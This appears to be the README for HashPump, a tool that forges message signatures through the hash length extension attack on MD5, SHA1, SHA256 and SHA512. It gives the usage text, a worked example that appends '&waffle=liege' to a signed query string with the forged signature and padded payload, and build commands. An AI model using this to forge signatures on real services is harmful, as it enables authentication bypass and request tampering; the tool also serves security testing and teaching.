A tool to exploit the hash length extension attack in various hashing algorithms
Currently supported algorithms: MD5, SHA1, SHA256, SHA512
./HashPump -hHashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength] HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack. -h --help Display this message. -t --test Run tests to verify each algorithm is operating properly. -s --signature The signature from known message. -d --data The data from the known message. -a --additional The information you would like to add to the known message. -k --keylength The length in bytes of the key being used to sign the original message with. Version 1.0 with MD5, SHA1, SHA256 and SHA512 support. <Developed by bwall(@botnet_hunter)>
./HashPump -s 6d5f807e23db210bc254a28be2d6759a0f5f5d99 --data count=10\&lat=37.351\&user_id=1\&long=-119.827\&waffle=eggo -a \&waffle=liege -k 140e41270260895979317fff3898ab85668953aaa2count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege
git clone https://github.com/bwall/HashPump.gitapt-get install g++ libssl-devmakemake install
apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.